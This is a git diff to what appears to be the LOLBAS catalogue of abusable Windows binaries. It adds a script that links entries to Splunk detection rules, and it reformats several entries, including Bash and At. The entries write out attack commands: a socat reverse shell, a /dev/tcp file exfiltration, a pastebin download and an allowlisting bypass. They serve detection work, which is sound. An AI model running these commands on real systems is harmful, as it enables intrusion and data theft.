diff --git a/scripts/enrich_with_splunk.py b/scripts/enrich_with_splunk.py new file mode 100644 index 00000000..ab44e994 --- /dev/null +++ b/scripts/enrich_with_splunk.py @@ -0,0 +1,182 @@ +import yaml +import argparse +import sys +import re +import json +from os import path, walk +from tqdm import tqdm + + +def read_security_content_detections(SECURITY_CONTENT_PATH, VERBOSE): + types = ["endpoint", "application", "cloud", "network", "web", "experimental", "deprecated"] + manifest_files = [] + for t in types: + for root, dirs, files in walk(SECURITY_CONTENT_PATH + 'detections/' + t): + for file in files: + if file.endswith(".yml"): + manifest_files.append((path.join(root, file))) + + detections = [] + for manifest_file in tqdm(manifest_files): + detection_yaml = dict() + if VERBOSE: + print("processing detection yaml {0}".format(manifest_file)) + + with open(manifest_file, 'r') as stream: + try: + if 'ssa' not in manifest_file: + object = list(yaml.safe_load_all(stream))[0] + object['file_path'] = manifest_file + except yaml.YAMLError as exc: + print(exc) + print("Error reading {0}".format(manifest_file)) + sys.exit(1) + detection_yaml = object + detections.append(detection_yaml) + return detections + +def read_lolbas(LOLBAS_PATH, VERBOSE): + types = ["OSBinaries", "OSLibraries", "OSScripts", "OtherMSBinaries"] + manifest_files = [] + for t in types: + for root, dirs, files in walk(LOLBAS_PATH + '/yml/' + t): + for file in files: + if file.endswith(".yml"): + manifest_files.append((path.join(root, file))) + + lolbas = [] + for manifest_file in tqdm(manifest_files): + lolba_yaml = dict() + if VERBOSE: + print("processing lolba yaml {0}".format(manifest_file)) + + with open(manifest_file, 'r') as stream: + try: + object = list(yaml.safe_load_all(stream))[0] + object['file_path'] = manifest_file + except yaml.YAMLError as exc: + print(exc) + print("Error reading {0}".format(manifest_file)) + sys.exit(1) + lolba_yaml = object + lolbas.append(lolba_yaml) + return lolbas + +def confirm_match(lolba, matching_id_detections): + matching_detections = [] + # grab just the name but not extension + search_word = lolba['Name'].split('.')[0] + # remove any (64) entries + search_word = re.sub(r'\(\d+\)', '', search_word) + + for detection in matching_id_detections: + if re.findall(search_word, detection['name'], re.IGNORECASE): + matching_detections.append(detection) + + return matching_detections + +def insert_splunk_detections(lolba, matching_detections): + splunk_detections = [] + + # build splunk detection entry object + for matching_detection in matching_detections: + detection_entry = {'Splunk' : "https://research.splunk.com/" + matching_detection['kind'] + "/" + matching_detection['id'] + "/"} + splunk_detections.append(detection_entry) + + # clean up current splunk entries + lolba_detections = [] + if 'Detection' in lolba and lolba['Detection'] != None: + for detection in lolba['Detection']: + lolba_detections.append(detection) + + # extend cleaned up detections with correct splunk urls + lolba_detections.extend(splunk_detections) + + # replace list with newly cleaned + lolba['Detection'] = lolba_detections + + return lolba + +def unique_detections(lolba_with_detections, lolba, VERBOSE): + # unique all detections + unique_detection_list = [] + if 'Detection' in lolba_with_detections and lolba_with_detections['Detection'] != None: + for detection in lolba_with_detections['Detection']: + if detection in unique_detection_list: + pass + else: + if VERBOSE: + print("enriching lolba {0} with matching splunk detection: {1}".format(lolba['Name'], detection)) + unique_detection_list.append(detection) + lolba['Detection'] = unique_detection_list + return lolba + +def enrich_lolbas(detections, lolbas, VERBOSE): + detections_with_mitre = dict() + enriched_lolbas = [] + + for detection in detections: + detection_obj = dict() + detection_obj['name'] = detection['name'] + detection_obj['id'] = detection['id'] + detection_obj['description'] = detection['description'] + detection_obj['kind'] = detection['file_path'].split('/')[-2] + + if 'mitre_attack_id' in detection['tags']: + for mitre_id in detection['tags']['mitre_attack_id']: + if mitre_id not in detections_with_mitre: + detections_with_mitre[mitre_id] = [] + detections_with_mitre[mitre_id].append(detection_obj) + else: + detections_with_mitre[mitre_id].append(detection_obj) + + lolba_with_detections = dict() + for lolba in lolbas: + for command in lolba['Commands']: + if 'MitreID' in command: + if command['MitreID'] in detections_with_mitre: + matching_id_detections = detections_with_mitre[command['MitreID']] + matching_detections = confirm_match(lolba,matching_id_detections) + lolba_with_detections = insert_splunk_detections(lolba, matching_detections) + + # unique all detections + lolba = unique_detections(lolba_with_detections, lolba, VERBOSE) + enriched_lolbas.append(lolba) + return enriched_lolbas + +def write_lolbas(enriched_lolbas, LOLBAS_PATH, VERBOSE): + for lolba in enriched_lolbas: + file_path = lolba['file_path'] + lolba.pop('file_path') + if VERBOSE: + print(yaml.dump(lolba, indent=2)) + with open(file_path, 'w') as outfile: + yaml.dump(lolba, outfile, default_flow_style=False, sort_keys=False) + +if __name__ == "__main__": + + # grab arguments + parser = argparse.ArgumentParser(description="Generates documentation from Splunk Security Content", epilog=""" + This generates documention in the form of jekyll site research.splunk.com from Splunk Security Content yamls. """) + parser.add_argument("-splunk_security_content_path", "--spath", required=False, default='security_content/', help="path to security_content repo") + parser.add_argument("-lolbas_path", "--lpath", required=False, default='.', help="path to the lolbas repo") + parser.add_argument("-v", "--verbose", required=False, default=False, action='store_true', help="prints verbose output") + + # parse them + args = parser.parse_args() + SECURITY_CONTENT_PATH = args.spath + LOLBAS_PATH = args.lpath + VERBOSE = args.verbose + + if not (path.isdir(SECURITY_CONTENT_PATH) or path.isdir(SECURITY_CONTENT_PATH)): + print("error: {0} is not a directory".format(SECURITY_CONTENT_PATH)) + sys.exit(1) + + print("processing splunk security content detections") + detections = read_security_content_detections(SECURITY_CONTENT_PATH, VERBOSE) + print("processing lolbas") + lolbas = read_lolbas(LOLBAS_PATH, VERBOSE) + print("enriching lolbas") + enriched_lolbas = enrich_lolbas(detections, lolbas, VERBOSE) + print("writing enriched lolbas") + write_lolbas(enriched_lolbas, LOLBAS_PATH, VERBOSE) \ No newline at end of file diff --git a/scripts/poetry.lock b/scripts/poetry.lock new file mode 100644 index 00000000..5e859ab4 --- /dev/null +++ b/scripts/poetry.lock @@ -0,0 +1,97 @@ +[[package]] +name = "colorama" +version = "0.4.5" +description = "Cross-platform colored terminal text." +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" + +[[package]] +name = "pyyaml" +version = "6.0" +description = "YAML parser and emitter for Python" +category = "main" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "tdqm" +version = "0.0.1" +description = "Alias for typos of tqdm" +category = "main" +optional = false +python-versions = "*" + +[package.dependencies] +tqdm = "*" + +[[package]] +name = "tqdm" +version = "4.64.0" +description = "Fast, Extensible Progress Meter" +category = "main" +optional = false +python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,>=2.7" + +[package.dependencies] +colorama = {version = "*", markers = "platform_system == \"Windows\""} + +[package.extras] +dev = ["py-make (>=0.1.0)", "twine", "wheel"] +notebook = ["ipywidgets (>=6)"] +slack = ["slack-sdk"] +telegram = ["requests"] + +[metadata] +lock-version = "1.1" +python-versions = "^3.10" +content-hash = "087bda08183848db65ef1c952e6b909f12ddf694a319a2d9523671101c8a7f8c" + +[metadata.files] +colorama = [ + {file = "colorama-0.4.5-py2.py3-none-any.whl", hash = "sha256:854bf444933e37f5824ae7bfc1e98d5bce2ebe4160d46b5edf346a89358e99da"}, + {file = "colorama-0.4.5.tar.gz", hash = "sha256:e6c6b4334fc50988a639d9b98aa429a0b57da6e17b9a44f0451f930b6967b7a4"}, +] +pyyaml = [ + {file = "PyYAML-6.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d4db7c7aef085872ef65a8fd7d6d09a14ae91f691dec3e87ee5ee0539d516f53"}, + {file = "PyYAML-6.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9df7ed3b3d2e0ecfe09e14741b857df43adb5a3ddadc919a2d94fbdf78fea53c"}, + {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:77f396e6ef4c73fdc33a9157446466f1cff553d979bd00ecb64385760c6babdc"}, + {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a80a78046a72361de73f8f395f1f1e49f956c6be882eed58505a15f3e430962b"}, + {file = "PyYAML-6.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:f84fbc98b019fef2ee9a1cb3ce93e3187a6df0b2538a651bfb890254ba9f90b5"}, + {file = "PyYAML-6.0-cp310-cp310-win32.whl", hash = "sha256:2cd5df3de48857ed0544b34e2d40e9fac445930039f3cfe4bcc592a1f836d513"}, + {file = "PyYAML-6.0-cp310-cp310-win_amd64.whl", hash = "sha256:daf496c58a8c52083df09b80c860005194014c3698698d1a57cbcfa182142a3a"}, + {file = "PyYAML-6.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:897b80890765f037df3403d22bab41627ca8811ae55e9a722fd0392850ec4d86"}, + {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50602afada6d6cbfad699b0c7bb50d5ccffa7e46a3d738092afddc1f9758427f"}, + {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:48c346915c114f5fdb3ead70312bd042a953a8ce5c7106d5bfb1a5254e47da92"}, + {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:98c4d36e99714e55cfbaaee6dd5badbc9a1ec339ebfc3b1f52e293aee6bb71a4"}, + {file = "PyYAML-6.0-cp36-cp36m-win32.whl", hash = "sha256:0283c35a6a9fbf047493e3a0ce8d79ef5030852c51e9d911a27badfde0605293"}, + {file = "PyYAML-6.0-cp36-cp36m-win_amd64.whl", hash = "sha256:07751360502caac1c067a8132d150cf3d61339af5691fe9e87803040dbc5db57"}, + {file = "PyYAML-6.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:819b3830a1543db06c4d4b865e70ded25be52a2e0631ccd2f6a47a2822f2fd7c"}, + {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:473f9edb243cb1935ab5a084eb238d842fb8f404ed2193a915d1784b5a6b5fc0"}, + {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0ce82d761c532fe4ec3f87fc45688bdd3a4c1dc5e0b4a19814b9009a29baefd4"}, + {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:231710d57adfd809ef5d34183b8ed1eeae3f76459c18fb4a0b373ad56bedcdd9"}, + {file = "PyYAML-6.0-cp37-cp37m-win32.whl", hash = "sha256:c5687b8d43cf58545ade1fe3e055f70eac7a5a1a0bf42824308d868289a95737"}, + {file = "PyYAML-6.0-cp37-cp37m-win_amd64.whl", hash = "sha256:d15a181d1ecd0d4270dc32edb46f7cb7733c7c508857278d3d378d14d606db2d"}, + {file = "PyYAML-6.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0b4624f379dab24d3725ffde76559cff63d9ec94e1736b556dacdfebe5ab6d4b"}, + {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:213c60cd50106436cc818accf5baa1aba61c0189ff610f64f4a3e8c6726218ba"}, + {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9fa600030013c4de8165339db93d182b9431076eb98eb40ee068700c9c813e34"}, + {file = "PyYAML-6.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:277a0ef2981ca40581a47093e9e2d13b3f1fbbeffae064c1d21bfceba2030287"}, + {file = "PyYAML-6.0-cp38-cp38-win32.whl", hash = "sha256:d4eccecf9adf6fbcc6861a38015c2a64f38b9d94838ac1810a9023a0609e1b78"}, + {file = "PyYAML-6.0-cp38-cp38-win_amd64.whl", hash = "sha256:1e4747bc279b4f613a09eb64bba2ba602d8a6664c6ce6396a4d0cd413a50ce07"}, + {file = "PyYAML-6.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:055d937d65826939cb044fc8c9b08889e8c743fdc6a32b33e2390f66013e449b"}, + {file = "PyYAML-6.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:e61ceaab6f49fb8bdfaa0f92c4b57bcfbea54c09277b1b4f7ac376bfb7a7c174"}, + {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d67d839ede4ed1b28a4e8909735fc992a923cdb84e618544973d7dfc71540803"}, + {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:cba8c411ef271aa037d7357a2bc8f9ee8b58b9965831d9e51baf703280dc73d3"}, + {file = "PyYAML-6.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:40527857252b61eacd1d9af500c3337ba8deb8fc298940291486c465c8b46ec0"}, + {file = "PyYAML-6.0-cp39-cp39-win32.whl", hash = "sha256:b5b9eccad747aabaaffbc6064800670f0c297e52c12754eb1d976c57e4f74dcb"}, + {file = "PyYAML-6.0-cp39-cp39-win_amd64.whl", hash = "sha256:b3d267842bf12586ba6c734f89d1f5b871df0273157918b0ccefa29deb05c21c"}, + {file = "PyYAML-6.0.tar.gz", hash = "sha256:68fb519c14306fec9720a2a5b45bc9f0c8d1b9c72adf45c37baedfcd949c35a2"}, +] +tdqm = [ + {file = "tdqm-0.0.1-py2-none-any.whl", hash = "sha256:85680e5b7d78470cd80f87f348180f3fc924afe799f472e0f2e71bc82927e0c1"}, + {file = "tdqm-0.0.1.tar.gz", hash = "sha256:f050004a76b1d22f70b78209b48781353c82440215b6ba7d22b1f499b05a0101"}, +] +tqdm = [ + {file = "tqdm-4.64.0-py2.py3-none-any.whl", hash = "sha256:74a2cdefe14d11442cedf3ba4e21a3b84ff9a2dbdc6cfae2c34addb2a14a5ea6"}, + {file = "tqdm-4.64.0.tar.gz", hash = "sha256:40be55d30e200777a307a7585aee69e4eabb46b4ec6a4b4a5f2d9f11e7d5408d"}, +] diff --git a/scripts/pyproject.toml b/scripts/pyproject.toml new file mode 100644 index 00000000..4bead04c --- /dev/null +++ b/scripts/pyproject.toml @@ -0,0 +1,16 @@ +[tool.poetry] +name = "enrich_with_splunk" +version = "0.1.0" +description = "Enriches LOLBAS YAMLs with Splunk Security Content detections" +authors = ["d1vious "] + +[tool.poetry.dependencies] +python = "^3.10" +PyYAML = "^6.0" +tdqm = "^0.0.1" + +[tool.poetry.dev-dependencies] + +[build-system] +requires = ["poetry-core>=1.0.0"] +build-backend = "poetry.core.masonry.api" diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index bc33d0ab..d3270fbe 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -1,22 +1,22 @@ ---- Name: AppInstaller.exe Description: Tool used for installation of AppX/MSIX applications on Windows 10 -Author: 'Wade Hickey' +Author: Wade Hickey Created: 2020-12-02 Commands: - - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw - Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 10, Windows 11 +- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw + Description: AppInstaller.exe is spawned by the default handler for the URI, it + attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 Full_Path: - - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe +- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/bdb00f403fd8ede0daa04449ad913200af9466ff/rules/windows/dns_query/win_dq_lobas_appinstaller.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/bdb00f403fd8ede0daa04449ad913200af9466ff/rules/windows/dns_query/win_dq_lobas_appinstaller.yml Resources: - - Link: https://twitter.com/notwhickey/status/1333900137232523264 +- Link: https://twitter.com/notwhickey/status/1333900137232523264 Acknowledgement: - - Person: Wade Hickey - Handle: '@notwhickey' +- Person: Wade Hickey + Handle: '@notwhickey' diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml index f653b36b..16a5ae12 100644 --- a/yml/OSBinaries/Aspnet_Compiler.yml +++ b/yml/OSBinaries/Aspnet_Compiler.yml @@ -1,27 +1,30 @@ ---- Name: Aspnet_Compiler.exe Description: ASP.NET Compilation Tool Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u - Description: Execute C# code with the Build Provider and proper folder structure in place. - Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10, Windows 11 +- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v + none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none + -u + Description: Execute C# code with the Build Provider and proper folder structure + in place. + Usecase: Execute proxied payload with Microsoft signed binary to bypass application + control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10, Windows 11 Full_Path: - - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe +- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Code_Sample: - - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml +- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +- Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml Resources: - - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ +- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 Acknowledgement: - - Person: cpl - Handle: '@cpl3h' +- Person: cpl + Handle: '@cpl3h' diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index 30df7297..fe98a085 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -1,36 +1,39 @@ ---- Name: At.exe Description: Schedule periodic tasks -Author: 'Freddie Barr-Smith' +Author: Freddie Barr-Smith Created: 2019-09-20 Commands: - - Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe - Description: Create a recurring task to execute every day at a specific time. - Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive - Category: Execute - Privileges: Local Admin - MitreID: T1053.002 - OperatingSystem: Windows 7 or older +- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su + C:\Windows\System32\revshell.exe + Description: Create a recurring task to execute every day at a specific time. + Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive + Category: Execute + Privileges: Local Admin + MitreID: T1053.002 + OperatingSystem: Windows 7 or older Full_Path: - - Path: C:\WINDOWS\System32\At.exe - - Path: C:\WINDOWS\SysWOW64\At.exe +- Path: C:\WINDOWS\System32\At.exe +- Path: C:\WINDOWS\SysWOW64\At.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_interactive_at.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_atsvc_task.yml - - IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job) - - IOC: C:\Windows\Tasks\At1.job - - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. +- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_interactive_at.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_atsvc_task.yml +- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job) +- IOC: C:\Windows\Tasks\At1.job +- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. +- Splunk: https://research.splunk.com/endpoint/7bc20606-5f40-11ec-a586-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/4be54858-432f-11ec-8209-3e22fbd008af/ +- Splunk: https://research.splunk.com/endpoint/bf0a378e-5f3c-11ec-a6de-acde48001122/ Resources: - - Link: https://freddiebarrsmith.com/at.txt - - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems +- Link: https://freddiebarrsmith.com/at.txt +- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html +- Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems Acknowledgement: - - Person: 'Freddie Barr-Smith' - Handle: - - Person: 'Riccardo Spolaor' - Handle: - - Person: 'Mariano Graziano' - Handle: - - Person: 'Xabier Ugarte-Pedrero' - Handle: +- Person: Freddie Barr-Smith + Handle: null +- Person: Riccardo Spolaor + Handle: null +- Person: Mariano Graziano + Handle: null +- Person: Xabier Ugarte-Pedrero + Handle: null diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 2f813bcd..728ed18a 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -1,27 +1,28 @@ ---- Name: Atbroker.exe Description: Helper binary for Assistive Technology (AT) -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: ATBroker.exe /start malware - Description: Start a registered Assistive Technology (AT). - Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry. - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: ATBroker.exe /start malware + Description: Start a registered Assistive Technology (AT). + Usecase: Executes code defined in registry for a new AT. Modifications must be made + to the system registry to either register or modify an existing Assistive Technology + (AT) service entry. + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\Atbroker.exe - - Path: C:\Windows\SysWOW64\Atbroker.exe +- Path: C:\Windows\System32\Atbroker.exe +- Path: C:\Windows\SysWOW64\Atbroker.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml - - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration - - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs - - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware +- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml +- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration +- IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs +- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware Resources: - - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ +- Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ Acknowledgement: - - Person: Adam - Handle: '@hexacorn' +- Person: Adam + Handle: '@hexacorn' diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 1a3a7b9f..f0f25766 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -1,50 +1,50 @@ ---- Name: Bash.exe Description: File used by Windows subsystem for Linux -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: bash.exe -c calc.exe - Description: Executes calc.exe from bash.exe - Usecase: Performs execution of specified file, can be used as a defensive evasion. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10 - - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" - Description: Executes a reverseshell - Usecase: Performs execution of specified file, can be used as a defensive evasion. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10 - - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' - Description: Exfiltrate data - Usecase: Performs execution of specified file, can be used as a defensive evasion. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10 - - Command: bash.exe -c calc.exe - Description: Executes calc.exe from bash.exe - Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. - Category: AWL Bypass - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10 +- Command: bash.exe -c calc.exe + Description: Executes calc.exe from bash.exe + Usecase: Performs execution of specified file, can be used as a defensive evasion. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10 +- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" + Description: Executes a reverseshell + Usecase: Performs execution of specified file, can be used as a defensive evasion. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10 +- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' + Description: Exfiltrate data + Usecase: Performs execution of specified file, can be used as a defensive evasion. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10 +- Command: bash.exe -c calc.exe + Description: Executes calc.exe from bash.exe + Usecase: Performs execution of specified file, can be used to bypass Application + Whitelisting. + Category: AWL Bypass + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10 Full_Path: - - Path: C:\Windows\System32\bash.exe - - Path: C:\Windows\SysWOW64\bash.exe +- Path: C:\Windows\System32\bash.exe +- Path: C:\Windows\SysWOW64\bash.exe Code_Sample: - - Code: +- Code: null Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_bash.yml - - IOC: Child process from bash.exe +- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +- Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_bash.yml +- IOC: Child process from bash.exe Resources: - - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Acknowledgement: - - Person: Alex Ionescu - Handle: '@aionescu' - - Person: Asif Matadar - Handle: '@d1r4c' +- Person: Alex Ionescu + Handle: '@aionescu' +- Person: Asif Matadar + Handle: '@d1r4c' diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index b1629e32..527a87c6 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ 